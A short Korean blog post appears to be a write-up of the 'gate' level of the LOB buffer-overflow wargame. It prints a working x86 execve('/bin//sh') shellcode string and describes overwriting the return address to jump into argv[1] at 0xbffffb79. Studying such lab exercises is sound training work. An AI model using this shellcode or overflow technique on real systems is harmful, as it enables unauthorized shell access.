gate에 들어가보니
gremlin, gremlin.c 2개 파일이 존재합니다.
c언어 파일을 확인해보니 위의 사진과 같네요.
argv[1]에 shellcode를 넣은 후, argv[1]주소로 프로세스가 종료될때 이동하게 만들어서 풀어보겠습니다.
사용한 shell code:
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80
argv[1]의 주소는 0xbffffb79네요
이걸 이용해서 풀어보면!
성공했습니다.
'CTF 공부 > LOB' 카테고리의 다른 글
| [LOB]orc (0) | 2020.01.24 |
|---|---|
| [LOB]goblin (0) | 2020.01.24 |
| [LOB]cobolt (0) | 2020.01.24 |
| [LOB]gremlin (0) | 2020.01.24 |
| [LOB]초기 설정 (0) | 2020.01.24 |
